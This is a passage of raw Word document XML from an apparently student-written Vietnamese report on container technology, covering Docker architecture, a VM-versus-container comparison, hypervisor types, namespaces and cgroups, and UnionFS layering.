      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tệp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tin, Container </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Image </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thiết</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lập</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>một</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>môi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trường</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cô</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lập</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gọn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nhẹ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đảm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bảo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tính</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>toàn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vẹn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cho</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ứng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dụng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>suốt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vòng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đời</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phát</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>triển</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vận</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hành</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE586C6" w14:textId="77777777" w:rsidR="00D70A7B" w:rsidRDefault="00D70A7B" w:rsidP="00D70A7B">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0256E711" wp14:editId="2758AAAC">
            <wp:extent cx="3537334" cy="3062470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1347424084" name="Picture 1" descr="container what is conta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ontainer what is contain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51806" cy="3074999"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D25F35" w14:textId="1574049F" w:rsidR="00D70A7B" w:rsidRPr="00D70A7B" w:rsidRDefault="00D70A7B" w:rsidP="00D70A7B">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc233498133"/>
      <w:r w:rsidRPr="00D70A7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D70A7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.Kiến trúc của </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70A7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ocker c</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D70A7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ontainer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="376AE757" w14:textId="56728E6C" w:rsidR="009F2546" w:rsidRPr="009E0111" w:rsidRDefault="009F2546" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc233498085"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Phân biệt Container và Máy ảo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="081BA3E8" w14:textId="77777777" w:rsidR="00817518" w:rsidRPr="00FA4830" w:rsidRDefault="00817518" w:rsidP="00817518">
      <w:r w:rsidRPr="00817518">
        <w:t xml:space="preserve">Việc so sánh kiến trúc giữa máy ảo (VM) và container là rất cần thiết để hiểu về sự dịch chuyển công nghệ hiện nay. Sự khác biệt cốt lõi nằm ở tầng cô lập tài </w:t>
      </w:r>
      <w:r w:rsidRPr="00817518">
        <w:lastRenderedPageBreak/>
        <w:t>nguyên: VM ảo hóa ở cấp độ phần cứng thông qua Hypervisor, trong khi container hóa vận hành ở cấp độ hệ điều hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CC67A0" w14:textId="04C802AF" w:rsidR="00C05E16" w:rsidRDefault="008C6FBD" w:rsidP="00D9170A">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3699701E" wp14:editId="7948D44D">
            <wp:extent cx="4537135" cy="1890215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1210064741" name="Picture 2" descr="Hypervisor-based virtualization archite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ypervisor-based virtualization architecture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55958" cy="1898057"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBABD27" w14:textId="0F05C56A" w:rsidR="00817518" w:rsidRPr="00FA4830" w:rsidRDefault="00C05E16" w:rsidP="00817518">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc233498134"/>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3</w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C05E16">
        <w:t>. Kiến trúc tổng thể của ảo hóa VM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="75A43822" w14:textId="380A6E3B" w:rsidR="00817518" w:rsidRPr="00FA4830" w:rsidRDefault="00D9170A" w:rsidP="00817518">
      <w:r w:rsidRPr="00D9170A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00817518" w:rsidRPr="00817518">
        <w:t>Hypervisor được chia thành hai loại chính: Type 1 (Bare-metal) chạy trực tiếp trên phần cứng, tối ưu hiệu năng và bảo mật cho trung tâm dữ liệu; và Type 2 (Hosted) chạy như ứng dụng trên hệ điều hành chủ, linh hoạt hơn nhưng hiệu năng thấp hơn do qua nhiều tầng trung gian.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD75D5B" w14:textId="4412B2B0" w:rsidR="00C05E16" w:rsidRDefault="00C9186E" w:rsidP="00C05E16">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CEE3134" wp14:editId="28C11D79">
            <wp:extent cx="3016155" cy="2580717"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1710870303" name="Picture 3" descr="Difference Between Type 1 and Type 2 Hypervisor?⠀ | DiskInter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ifference Between Type 1 and Type 2 Hypervisor?⠀ | DiskInternal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24565" cy="2587912"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ECE459" w14:textId="0FA28074" w:rsidR="00C9186E" w:rsidRDefault="00C05E16" w:rsidP="00D9170A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc233498135"/>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4</w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C05E16">
        <w:t>. Mô hình kiến trúc Hypervis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">or Type 1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="30EA3A8F" w14:textId="4514A02B" w:rsidR="00817518" w:rsidRPr="00817518" w:rsidRDefault="00817518" w:rsidP="00817518">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817518">
        <w:t>Khác với máy ảo, Containerization tận dụng trực tiếp nhân hệ điều hành chủ và các tính năng cô lập của Linux (Namespaces để tách biệt không gian, cgroups để giới hạn tài nguyên) nhằm tạo môi trường chạy ứng dụng biệt lập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC39C71" w14:textId="77777777" w:rsidR="00C05E16" w:rsidRDefault="00C9186E" w:rsidP="00C05E16">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63718F0D" wp14:editId="09F7E5B8">
            <wp:extent cx="3201627" cy="2135875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1887470687" name="Picture 4" descr="What is Containerization Software? Definition &amp;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What is Containerization Software? Definition &amp; Benefit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06135" cy="2138882"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F34779" w14:textId="5944D255" w:rsidR="00C9186E" w:rsidRPr="005062A7" w:rsidRDefault="00C05E16" w:rsidP="00C05E16">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc233498136"/>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5</w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C05E16">
        <w:t>. Mô hình phân lớp kiến trúc Contain</w:t>
      </w:r>
      <w:r w:rsidRPr="005062A7">
        <w:t>er</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="7CBBCB41" w14:textId="77777777" w:rsidR="00817518" w:rsidRPr="00817518" w:rsidRDefault="00817518" w:rsidP="00817518">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc233498086"/>
      <w:r w:rsidRPr="00817518">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Container Engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00817518">
        <w:t xml:space="preserve"> (Docker, Podman) đóng vai trò điều phối bằng cách thiết lập các ranh giới phần mềm thay vì phân chia phần cứng. Nhờ loại bỏ tầng </w:t>
      </w:r>
      <w:r w:rsidRPr="00817518">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Guest OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00817518">
        <w:t xml:space="preserve"> cồng kềnh và chỉ đóng gói các thư viện tối thiểu, container đạt kích thước siêu nhẹ (vài chục đến vài trăm MB) và khởi động gần như tức thời.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8AEDF3" w14:textId="2EA14AB5" w:rsidR="009D772B" w:rsidRDefault="009D772B" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E0111">
        <w:t>Kiến trúc phân lớp của hệ thống Container</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="2DB96245" w14:textId="19154F83" w:rsidR="00817518" w:rsidRPr="00817518" w:rsidRDefault="00817518" w:rsidP="00817518">
      <w:r w:rsidRPr="00817518">
        <w:t>UnionFS là cơ chế gắn kết cho phép tích hợp nhiều lớp dữ liệu thành một thư mục duy nhất. Với đặc tính "phân tầng" (chỉ ghi thay đổi vào lớp trên cùng) và "tối ưu hóa" (tái sử dụng tài nguyên), nó giúp tiết kiệm dung lượng lưu trữ và tăng tốc độ khởi tạo dịch vụ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6278919B" w14:textId="77777777" w:rsidR="00C05E16" w:rsidRDefault="00E45A5B" w:rsidP="00C05E16">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="180BA94B" wp14:editId="2ED21E3B">
            <wp:extent cx="3129596" cy="1767385"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="265283108" name="Picture 3" descr="Union File Syst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Union File System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36067" cy="1771039"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C17C8D" w14:textId="6050FD89" w:rsidR="00695BEE" w:rsidRPr="005062A7" w:rsidRDefault="00C05E16" w:rsidP="00C05E16">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc233498137"/>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6</w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005062A7">
        <w:t>. Mô hình kiến trúc phân lớp của UFS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1C5DACEE" w14:textId="644C4BDE" w:rsidR="00B106C3" w:rsidRDefault="00B106C3" w:rsidP="00B106C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ảnh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> container (Container Image) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
